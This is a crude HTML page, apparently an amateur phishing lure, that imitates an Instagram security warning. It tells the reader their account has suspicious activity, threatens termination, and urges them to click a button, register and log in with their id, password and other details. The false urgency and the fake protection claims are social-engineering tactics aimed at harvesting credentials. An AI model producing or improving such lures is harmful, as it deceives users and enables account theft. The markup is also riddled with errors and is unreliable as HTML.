<!dotetype html>
<head>
<title>contect</title>
<link rel="stylesheet" type="text/css" href="css/cstyle.css">
</head>
<header align="center">
<img src="/home/arbas19/web/wb1/img/im.png">
</header>
<body bgcolor="lightgray">


<nav>
<ul>
<li class="active"><a href="index.html">home</a></li>
<li><a href="about.html">about</a></li>
</ul>
<img src="/home/arbas19/web/wb1/img/wlpapr.png">
<h1>
Hi user in some days your instagram account have suspicius activity.so you can comfarm that in activity could by you.Thank you
</h1>
<ul>
<li style="color:red;">if you not done this your account is terminate</li>
<li>to process this <button type =Click"value""Click"><a herf="YouTube.html">Click</a></button> the link </li>
</ui>

<h2>
How to secure:-
</h2>
<ul>
<li>click the button</li>
<li>resister frist</li>
<li>login with id and password</li>
<li>fill require deatails</li>
<li>save and enjoy</li>
</ui>

<h2>
<font size="5.5">what our team do</font>
</h2>
<ul>
<font size="4.5">
<li>save and secure account</li>
<li>nobody can hack</li>
<li>protect from virus</li>
<li>protect scemmer</li>
<li>alert from dark activites</li>
</font>
</ul>
<h3>
<font size="5">
click this link
</font>
</h3>
<button type=click"value"click style="color:blue;">click</button>
</html>
